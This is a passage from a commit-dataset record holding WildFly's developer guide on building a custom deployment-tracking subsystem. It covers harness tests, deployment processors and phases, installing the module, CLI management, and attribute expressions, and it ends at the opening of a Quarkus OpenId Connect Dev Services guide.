servicesA.readWholeModel();\n String marshalled = servicesA.getPersistedSubsystemXml();\n\u00a0\n \/\/Install the persisted xml from the first controller into a second controller\n KernelServices servicesB = super.installInController(marshalled);\n----\n\nFinally we read the model from the second controller, and make sure that\nthe models are identical by calling `compare()` on the test superclass.\n\n[source,java,options=\"nowrap\"]\n----\nModelNode modelB = servicesB.readWholeModel();\n\u00a0\n \/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n }\n----\n\nWe then have a test that needs no changing from what the archetype\nprovides us with. As we have seen before we start a controller\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testDescribeHandler() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \"<\/subsystem>\";\n KernelServices servicesA = super.installInController(subsystemXml);\n----\n\nWe then call `\/subsystem=tracker:describe` which outputs the subsystem\nas operations needed to reach the current state (Done by our\n`SubsystemDescribeHandler`)\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Get the model and the describe operations from the first controller\n ModelNode modelA = servicesA.readWholeModel();\n ModelNode describeOp = new ModelNode();\n describeOp.get(OP).set(DESCRIBE);\n describeOp.get(OP_ADDR).set(\n PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME)).toModelNode());\n List<ModelNode> operations = super.checkResultAndGetContents(servicesA.executeOperation(describeOp)).asList();\n----\n\nThen we create a new controller using those operations\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Install the describe options from the first controller into a second controller\n KernelServices servicesB = super.installInController(operations);\n----\n\nAnd then we read the model from the second controller and make sure that\nthe two subsystems are identical +\nModelNode modelB = servicesB.readWholeModel();\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Make sure the models from the two controllers are identical\n super.compare(modelA, modelB);\n\u00a0\n }\n----\n\nTo test the removal of the the subsystem and child resources we modify\nthe `testSubsystemRemoval()` test provided by the archetype:\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Tests that the subsystem can be removed\n *\/\n @Test\n public void testSubsystemRemoval() throws Exception {\n \/\/Parse the subsystem xml and install into the first controller\n----\n\nWe provide xml for the subsystem installing a child, which in turn\ninstalls a TrackerService\n\n[source,java,options=\"nowrap\"]\n----\nString subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nHaving installed the xml into the controller we make sure the\nTrackerService is there\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Sanity check to test the service for 'tst' was there\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n----\n\nThis call from the subsystem test harness will call remove for each\nlevel in our subsystem, children first and validate +\nthat the subsystem model is empty at the end.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Checks that the subsystem was removed from the model\n super.assertRemoveSubsystemResources(services);\n----\n\nFinally we check that all the services were removed by the remove\nhandlers\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that any services that were installed were removed here\n try {\n services.getContainer().getRequiredService(TrackerService.createServiceName(\"tst\"));\n Assert.fail(\"Should have removed services\");\n } catch (Exception expected) {\n }\n }\n----\n\nFor good measure let us throw in another test which adds a\n`deployment-type` and also changes its attribute at runtime. So first of\nall boot up the controller with the same xml we have been using so far\n\n[source,java,options=\"nowrap\"]\n----\n@Test\n public void testExecuteOperations() throws Exception {\n String subsystemXml =\n \"<subsystem xmlns=\\\"\" + SubsystemExtension.NAMESPACE + \"\\\">\" +\n \" <deployment-types>\" +\n \" <deployment-type suffix=\\\"tst\\\" tick=\\\"12345\\\"\/>\" +\n \" <\/deployment-types>\" +\n \"<\/subsystem>\";\n KernelServices services = super.installInController(subsystemXml);\n----\n\nNow create an operation which does the same as the following CLI command\n`\/subsystem=tracker\/type=foo:add(tick=1000)`\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Add another type\n PathAddress fooTypeAddr = PathAddress.pathAddress(\n PathElement.pathElement(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME),\n PathElement.pathElement(\"type\", \"foo\"));\n ModelNode addOp = new ModelNode();\n addOp.get(OP).set(ADD);\n addOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n addOp.get(\"tick\").set(1000);\n----\n\nExecute the operation and make sure it was successful\n\n[source,java,options=\"nowrap\"]\n----\nModelNode result = services.executeOperation(addOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nRead the whole model and make sure that the original data is still there\n(i.e. the same as what was done by `testInstallIntoController()`\n\n[source,java,options=\"nowrap\"]\n----\nModelNode model = services.readWholeModel();\n Assert.assertTrue(model.get(SUBSYSTEM).hasDefined(SubsystemExtension.SUBSYSTEM_NAME));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME).hasDefined(\"type\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"tst\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\").hasDefined(\"tick\"));\n Assert.assertEquals(12345, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"tst\", \"tick\").asLong());\n----\n\nThen make sure our new `type` has been added:\n\n[source,java,options=\"nowrap\"]\n----\nAssert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\").hasDefined(\"foo\"));\n Assert.assertTrue(model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\").hasDefined(\"tick\"));\n Assert.assertEquals(1000, model.get(SUBSYSTEM, SubsystemExtension.SUBSYSTEM_NAME, \"type\", \"foo\", \"tick\").asLong());\n----\n\nThen we call `write-attribute` to change the `tick` value of\n`\/subsystem=tracker\/type=foo`:\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Call write-attribute\n ModelNode writeOp = new ModelNode();\n writeOp.get(OP).set(WRITE_ATTRIBUTE_OPERATION);\n writeOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n writeOp.get(NAME).set(\"tick\");\n writeOp.get(VALUE).set(3456);\n result = services.executeOperation(writeOp);\n Assert.assertEquals(SUCCESS, result.get(OUTCOME).asString());\n----\n\nTo give you exposure to other ways of doing things, now instead of\nreading the whole model to check the attribute, we call `read-attribute`\ninstead, and make sure it has the value we set it to.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Check that write attribute took effect, this time by calling read-attribute instead of reading the whole model\n ModelNode readOp = new ModelNode();\n readOp.get(OP).set(READ_ATTRIBUTE_OPERATION);\n readOp.get(OP_ADDR).set(fooTypeAddr.toModelNode());\n readOp.get(NAME).set(\"tick\");\n result = services.executeOperation(readOp);\n Assert.assertEquals(3456, checkResultAndGetContents(result).asLong());\n----\n\nSince each `type` installs its own copy of `TrackerService`, we get the\n`TrackerService` for `type=foo` from the service container exposed by\nthe kernel services and make sure it has the right value\n\n[source,java,options=\"nowrap\"]\n----\nTrackerService service = (TrackerService)services.getContainer().getService(TrackerService.createServiceName(\"foo\")).getValue();\n Assert.assertEquals(3456, service.getTick());\n }\n----\n\nTypeDefinition.TICK.\n\n[[add-the-deployers]]\n== Add the deployers\n\nWhen discussing `SubsystemAddHandler` we did not mention the work done\nto install the deployers, which is done in the following method:\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n public void performBoottime(OperationContext context, ModelNode operation, ModelNode model,\n ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers)\n throws OperationFailedException {\n\u00a0\n log.info(\"Populating the model\");\n\u00a0\n \/\/Add deployment processors here\n \/\/Remove this if you don't need to hook into the deployers, or you can add as many as you like\n \/\/see SubDeploymentProcessor for explanation of the phases\n context.addStep(new AbstractDeploymentChainStep() {\n public void execute(DeploymentProcessorTarget processorTarget) {\n processorTarget.addDeploymentProcessor(SubsystemDeploymentProcessor.PHASE, SubsystemDeploymentProcessor.priority, new SubsystemDeploymentProcessor());\n\u00a0\n }\n }, OperationContext.Stage.RUNTIME);\n\u00a0\n }\n----\n\nThis adds an extra step which is responsible for installing deployment\nprocessors. You can add as many as you like, or avoid adding any all\ntogether depending on your needs. Each processor has a `Phase` and a\n`priority`. Phases are sequential, and a deployment passes through each\nphases deployment processors. The `priority` specifies where within a\nphase the processor appears. See `org.jboss.as.server.deployment.Phase`\nfor more information about phases.\n\nIn our case we are keeping it simple and staying with one deployment\nprocessor with the phase and priority created for us by the maven\narchetype. The phases will be explained in the next section. The\ndeployment processor is as follows:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDeploymentProcessor implements DeploymentUnitProcessor {\n ...\n\u00a0\n @Override\n public void deploy(DeploymentPhaseContext phaseContext) throws DeploymentUnitProcessingException {\n String name = phaseContext.getDeploymentUnit().getName();\n TrackerService service = getTrackerService(phaseContext.getServiceRegistry(), name);\n if (service != null) {\n ResourceRoot root = phaseContext.getDeploymentUnit().getAttachment(Attachments.DEPLOYMENT_ROOT);\n VirtualFile cool = root.getRoot().getChild(\"META-INF\/cool.txt\");\n service.addDeployment(name);\n if (cool.exists()) {\n service.addCoolDeployment(name);\n }\n }\n }\n\u00a0\n @Override\n public void undeploy(DeploymentUnit context) {\n context.getServiceRegistry();\n String name = context.getName();\n TrackerService service = getTrackerService(context.getServiceRegistry(), name);\n if (service != null) {\n service.removeDeployment(name);\n }\n }\n\u00a0\n private TrackerService getTrackerService(ServiceRegistry registry, String name) {\n int last = name.lastIndexOf(\".\");\n String suffix = name.substring(last + 1);\n ServiceController<?> container = registry.getService(TrackerService.createServiceName(suffix));\n if (container != null) {\n TrackerService service = (TrackerService)container.getValue();\n return service;\n }\n return null;\n }\n}\n----\n\nThe `deploy()` method is called when a deployment is being deployed. In\nthis case we look for the `TrackerService` instance for the service name\ncreated from the deployment's suffix. If there is one it means that we\nare meant to be tracking deployments with this suffix (i.e.\n`TypeAddHandler` was called for this suffix), and if we find one we add\nthe deployment's name to it. Similarly `undeploy()` is called when a\ndeployment is being undeployed, and if there is a `TrackerService`\ninstance for the deployment's suffix, we remove the deployment's name\nfrom it.\n\n[[deployment-phases-and-attachments]]\n=== Deployment phases and attachments\n\nThe code in the SubsystemDeploymentProcessor uses an _attachment_, which\nis the means of communication between the individual deployment\nprocessors. A deployment processor belonging to a phase may create an\nattachment which is then read further along the chain of deployment unit\nprocessors. In the above example we look for the\n`Attachments.DEPLOYMENT_ROOT` attachment, which is a view of the file\nstructure of the deployment unit put in place before the chain of\ndeployment unit processors is invoked.\n\nAs mentioned above, the deployment unit processors are organized in\nphases, and have a relative order within each phase. A deployment unit\npasses through all the deployment unit processors in that order. A\ndeployment unit processor may choose to take action or not depending on\nwhat attachments are available. Let's take a quick look at what the\ndeployment unit processors for in the phases described in\n`org.jboss.as.server.deployment.Phase`.\n\n[[structure]]\n==== STRUCTURE\n\nThe deployment unit processors in this phase determine the structure of\na deployment, and looks for sub deployments and metadata files.\n\n[[parse]]\n==== PARSE\n\nIn this phase the deployment unit processors parse the deployment\ndescriptors and build up the annotation index. `Class-Path` entries from\nthe META-INF\/MANIFEST.MF are added.\n\n[[dependencies]]\n==== DEPENDENCIES\n\nExtra class path dependencies are added. For example if deploying a\n`war` file, the commonly needed dependencies for a web application are\nadded.\n\n[[configure_module]]\n==== CONFIGURE_MODULE\n\nIn this phase the modular class loader for the deployment is created. No\nattempt should be made loading classes from the deployment until *after*\nthis phase.\n\n[[post_module]]\n==== POST_MODULE\n\nNow that our class loader has been constructed we have access to the\nclasses. In this stage deployment processors may use the\n`Attachments.REFLECTION_INDEX` attachment which is a deployment index\nused to obtain members of classes in the deployment, and to invoke upon\nthem, bypassing the inefficiencies of using `java.lang.reflect`\ndirectly.\n\n[[install]]\n==== INSTALL\n\nInstall new services coming from the deployment.\n\n[[cleanup]]\n==== CLEANUP\n\nAttachments put in place earlier in the deployment unit processor chain\nmay be removed here.\n\n[[integrate-with-wildfly]]\n== Integrate with WildFly\n\nNow that we have all the code needed for our subsystem, we can build our\nproject by running `mvn install`\n\n[source,options=\"nowrap\"]\n----\n[kabir ~\/sourcecontrol\/temp\/archetype-test\/acme-subsystem]\n$mvn install\n[INFO] Scanning for projects...\n[...]\nmain:\n [delete] Deleting: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/null1004283288\n [delete] Deleting directory \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [copy] Copying 1 file to \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/module\/com\/acme\/corp\/tracker\/main\n [echo] Module com.acme.corp.tracker has been created in the target\/module directory. Copy to your JBoss AS 7 installation.\n[INFO] Executed tasks\n[INFO]\n[INFO] --- maven-install-plugin:2.3.1:install (default-install) @ acme-subsystem ---\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/acme-subsystem.jar to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.jar\n[INFO] Installing \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/pom.xml to \/Users\/kabir\/.m2\/repository\/com\/acme\/corp\/acme-subsystem\/1.0-SNAPSHOT\/acme-subsystem-1.0-SNAPSHOT.pom\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 5.851s\n[INFO] Finished at: Mon Jul 11 23:24:58 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n----\n\nThis will have built our project and assembled a module for us that can\nbe used for installing it into WildFly. If you go to the `target\/module`\nfolder where you built the project you will see the module\n\n[source,options=\"nowrap\"]\n----\n$ls target\/module\/com\/acme\/corp\/tracker\/main\/\nacme-subsystem.jar module.xml\n----\n\nThe `module.xml` comes from `src\/main\/resources\/module\/main\/module.xml`\nand is used to define your module. It says that it contains the\n`acme-subsystem.jar`:\n\n[source,xml,options=\"nowrap\"]\n----\n<module xmlns=\"urn:jboss:module:1.0\" name=\"com.acme.corp.tracker\">\n <resources>\n <resource-root path=\"acme-subsystem.jar\"\/>\n <\/resources>\n----\n\nAnd has a default set of dependencies needed by every subsystem created.\nIf your subsystem requires additional module dependencies you can add\nthem here before building and installing.\n\n[source,xml,options=\"nowrap\"]\n----\n <dependencies>\n <module name=\"javax.api\"\/>\n <module name=\"org.jboss.staxmapper\"\/>\n <module name=\"org.jboss.as.controller\"\/>\n <module name=\"org.jboss.as.server\"\/>\n <module name=\"org.jboss.modules\"\/>\n <module name=\"org.jboss.msc\"\/>\n <module name=\"org.jboss.logging\"\/>\n <module name=\"org.jboss.vfs\"\/>\n <\/dependencies>\n<\/module>\n----\n\nNote that the name of the module corresponds to the directory structure\ncontaining it. Now copy the `target\/module\/com\/acme\/corp\/tracker\/main\/`\ndirectory and its contents to\n`$WFLY\/modules\/com\/acme\/corp\/tracker\/main\/` (where `$WFLY` is the root\nof your WildFly install).\n\nNext we need to modify `$WFLY\/standalone\/configuration\/standalone.xml`.\nFirst we need to add our new module to the `<extensions>` section:\n\n[source,java,options=\"nowrap\"]\n----\n <extensions>\n ...\n <extension module=\"org.jboss.as.weld\"\/>\n <extension module=\"com.acme.corp.tracker\"\/>\n <\/extensions>\n----\n\nAnd then we have to add our subsystem to the `<profile>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n <profile>\n ...\n\u00a0\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n <\/subsystem>\n ...\n <\/profile>\n----\n\nAdding this to a managed domain works exactly the same apart from in\nthis case you need to modify `$WFLY\/domain\/configuration\/domain.xml`.\n\nNow start up WildFly by running `$WFLY\/bin\/standalone.sh` and you should\nsee messages like these after the server has started, which means our\nsubsystem has been added and our `TrackerService` is working:\n\n....\n15:27:33,838 INFO [org.jboss.as] (Controller Boot Thread) JBoss AS 7.0.0.Final \"Lightning\" started in 2861ms - Started 94 of 149 services (55 services are passive or on-demand)\n15:27:42,966 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:42,966 INFO [stdout] (Thread-8) []\n15:27:42,967 INFO [stdout] (Thread-8) Cool: 0\n15:27:42,967 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:27:42,967 INFO [stdout] (Thread-9) []\n15:27:42,967 INFO [stdout] (Thread-9) Cool: 0\n15:27:52,967 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:52,967 INFO [stdout] (Thread-8) []\n15:27:52,967 INFO [stdout] (Thread-8) Cool: 0\n....\n\nIf you run the command line interface you can execute some commands to\nsee more about the subsystem. For example\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource-description(recursive=true, operations=true)\n----\n\nwill return a lot of information, including what we provided in the\n`DescriptionProvider`s we created to document our subsystem.\n\nTo see the current subsystem state you can execute\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"war\" => {\"tick\" => 10000L},\n \"sar\" => {\"tick\" => 10000L}\n }}\n}\n----\n\nWe can remove both the deployment types which removes them from the\nmodel:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=sar:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => undefined}\n}\n----\n\nYou should now see the output from the `TrackerService` instances having\nstopped.\n\nNow, let's add the war tracker again:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:add\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\"war\" => {\"tick\" => 10000L}}}\n}\n----\n\nand the WildFly console should show the messages coming from the war\n`TrackerService` again.\n\nNow let us deploy something. You can find two maven projects for test\nwars already built at link:downloads\/test1.zip[test1.zip] and\nlink:downloads\/test2.zip[test2.zip]. If you download them and\nextract them to `\/Downloads\/test1` and `\/Downloads\/test2`, you can see\nthat `\/Downloads\/test1\/target\/test1.war` contains a `META-INF\/cool.txt`\nwhile `\/Downloads\/test2\/target\/test2.war` does not contain that file.\nFrom CLI deploy `test1.war` first:\n\n[source,java,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/Downloads\/test1\/target\/test1.war\n'test1.war' deployed successfully.\n----\n\nAnd you should now see the output from the war `TrackerService` list the\ndeployments:\n\n....\n15:35:03,712 INFO [org.jboss.as.server.deployment] (MSC service thread 1-2) Starting deployment of \"test1.war\"\n15:35:03,988 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test1\n15:35:03,996 INFO [org.jboss.as.server.controller] (pool-2-thread-9) Deployed \"test1.war\"\n15:35:13,056 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:35:13,056 INFO [stdout] (Thread-9) [test1.war]\n15:35:13,057 INFO [stdout] (Thread-9) Cool: 1\n....\n\nSo our `test1.war` got picked up as a 'cool' deployment. Now if we\ndeploy `test2.war`\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/sourcecontrol\/temp\/archetype-test\/test2\/target\/test2.war\n'test2.war' deployed successfully.\n----\n\nYou will see that deployment get picked up as well but since there is no\n`META-INF\/cool.txt` it is not marked as a 'cool' deployment:\n\n....\n15:37:05,634 INFO [org.jboss.as.server.deployment] (MSC service thread 1-4) Starting deployment of \"test2.war\"\n15:37:05,699 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test2\n15:37:05,982 INFO [org.jboss.as.server.controller] (pool-2-thread-15) Deployed \"test2.war\"\n15:37:13,075 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:37:13,075 INFO [stdout] (Thread-9) [test1.war, test2.war]\n15:37:13,076 INFO [stdout] (Thread-9) Cool: 1\n....\n\nAn undeploy\n\n[source,java,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] undeploy test1.war\nSuccessfully undeployed test1.war.\n----\n\nis also reflected in the `TrackerService` output:\n\n....\n15:38:47,901 INFO [org.jboss.as.server.controller] (pool-2-thread-21) Undeployed \"test1.war\"\n15:38:47,934 INFO [org.jboss.as.server.deployment] (MSC service thread 1-3) Stopped deployment test1.war in 40ms\n15:38:53,091 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:38:53,092 INFO [stdout] (Thread-9) [test2.war]\n15:38:53,092 INFO [stdout] (Thread-9) Cool: 0\n....\n\nFinally, we registered a write attribute handler for the `tick` property\nof the `type` so we can change the frequency\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:write-attribute(name=tick,value=1000)\n{\"outcome\" => \"success\"}\n----\n\nYou should now see the output from the `TrackerService` happen every\nsecond\n\n....\n15:39:43,100 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:43,100 INFO [stdout] (Thread-9) [test2.war]\n15:39:43,101 INFO [stdout] (Thread-9) Cool: 0\n15:39:44,101 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:44,102 INFO [stdout] (Thread-9) [test2.war]\n15:39:44,105 INFO [stdout] (Thread-9) Cool: 0\n15:39:45,106 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:45,106 INFO [stdout] (Thread-9) [test2.war]\n....\n\nIf you open `$WFLY\/standalone\/configuration\/standalone.xml` you can see\nthat our subsystem entry reflects the current state of the subsystem:\n\n[source,xml,options=\"nowrap\"]\n----\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"war\" tick=\"1000\"\/>\n <\/deployment-types>\n <\/subsystem>\n----\n\n[[expressions]]\n== Expressions\n\nExpressions are mechanism that enables you to support variables in your\nattributes, for instance when you want the value of attribute to be\nresolved using system \/ environment properties.\n\nAn example expression is\n\n....\n${jboss.bind.address.management:127.0.0.1}\n....\n\nwhich means that the value should be taken from a system property named\n`jboss.bind.address.management` and if it is not defined use\n`127.0.0.1`.\n\n[[what-expression-types-are-supported]]\n=== What expression types are supported\n\n* System properties, which are resolved using\n`java.lang.System.getProperty(String key)`\n* Environment properties, which are resolved using\n`java.lang.System.getEnv(String name)`.\n* Security vault expressions, resolved against the security vault\nconfigured for the server or Host Controller that needs to resolve the\nexpression.\n\nIn all cases, the syntax for the expression is\n\n....\n${expression_to_resolve}\n....\n\nFor an expression meant to be resolved against environment properties,\nthe `expression_to_resolve` must be prefixed with `env.`. The portion\nafter `env.` will be the name passed to\n`java.lang.System.getEnv(String name)`.\n\nSecurity vault expressions do not support default values (i.e. the\n`127.0.0.1` in the `jboss.bind.address.management:127.0.0.1` example\nabove.)\n\n[[how-to-support-expressions-in-subsystems]]\n=== How to support expressions in subsystems\n\nThe easiest way is by using AttributeDefinition, which provides support\nfor expressions just by using it correctly.\n\nWhen we create an AttributeDefinition all we need to do is mark that is\nallows expressions. Here is an example how to define an attribute that\nallows expressions to be used.\n\n[source,java,options=\"nowrap\"]\n----\nSimpleAttributeDefinition MY_ATTRIBUTE =\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 new SimpleAttributeDefinitionBuilder(\"my-attribute\", ModelType.INT, true)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0 .setAllowExpression(true)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .setDefaultValue(new ModelNode(1))\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .build();\n----\n\nThen later when you are parsing the xml configuration you should use the\nMY_ATTRIBUTE attribute definition to set the value to the management\noperation ModelNode you are creating.\n\n[source,java,options=\"nowrap\"]\n----\n....\n\u00a0\u00a0\u00a0\u00a0\u00a0 String attr = reader.getAttributeLocalName(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0 String value = reader.getAttributeValue(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0 if (attr.equals(\"my-attribute\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.parseAndSetParameter(value, operation, reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0 } else if (attr.equals(\"suffix\")) {\n.....\n----\n\nNote that this just helps you to properly set the value to the model\nnode you are working on, so no need to additionally set anything to the\nmodel for this attribute. Method parseAndSetParameter parses the value\nthat was read from xml for possible expressions in it and if it finds\nany it creates special model node that defines that node is of type\n`ModelType.EXPRESSION`.\n\nLater in your operation handlers where you implement populateModel and\nhave to store the value from the operation to the configuration model\nyou also use this MY_ATTRIBUTE attribute definition.\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n\u00a0protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.validateAndSet(operation,model);\n\u00a0}\n----\n\nThis will make sure that the attribute that is stored from the operation\nto the model is valid and nothing is lost. It also checks the value\nstored in the operation `ModelNode`, and if it isn't already\n`ModelType.EXPRESSION`, it checks if the value is a string that contains\nthe expression syntax. If so, the value stored in the model will be of\ntype `ModelType.EXPRESSION`. Doing this ensures that expressions are\nproperly handled when they appear in operations that weren't created by\nthe subsystem parser, but are instead passed in from CLI or admin\nconsole users.\n\nAs last step we need to use the value of the attribute. This is usually\nneeded inside of the `performRuntime` method\n\n[source,java,options=\"nowrap\"]\n----\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model, ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers) throws OperationFailedException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ....\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 final int attributeValue = MY_ATTRIBUTE.resolveModelAttribute(context, model).asInt();\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ...\n\u00a0\n\u00a0\u00a0\u00a0 }\n----\n\nAs you can see resolving of attribute's value is not done until it is\nneeded for use in the subsystem's runtime services. The resolved value\nis not stored in the configuration model, the unresolved expression is.\nThat way we do not lose any information in the model and can assure that\nalso marshalling is done properly, where we must marshall back the\nunresolved value.\n\nAttribute definitinon also helps you with that:\n\n[source,java,options=\"nowrap\"]\n----\n public void writeContent(XMLExtendedStreamWriter writer, SubsystemMarshallingContext context) throws XMLStreamException {\n\u00a0\u00a0\u00a0 ....\n\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.marshallAsAttribute(sessionData, writer);\n\u00a0\u00a0\u00a0\u00a0\u00a0 MY_OTHER_ATTRIBUTE.marshallAsElement(sessionData, false, writer);\n\u00a0\u00a0\u00a0 ...\n}\n----\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"817d5f86cd60c147cd6dea870f6897e080da0d6a","subject":"Fix various issues in newly added security-openid-connect-dev-services.adoc","message":"Fix various issues in newly added security-openid-connect-dev-services.adoc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-openid-connect-dev-services.adoc","new_file":"docs\/src\/main\/asciidoc\/security-openid-connect-dev-services.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Dev Services for OpenId Connect\n\ninclude::.\/attributes.adoc[]\n\nThis guide covers the Dev Services for OpenId Connect Keycloak provider and explains how to support other OpenId Connect providers.\n\n== Introduction\n\nQuarkus introduces an experimental `Dev Services For Keycloak` feature which is enabled by default when the `quarkus-oidc` extension is started in dev mode. It starts a Keycloak container and initializes it by registering the existing Keycloak realm or creating a new realm with the client and users for you to start developing your Quarkus application secured by Keycloak immediately. It will restart a container when the `application.properties` or the realm file changes 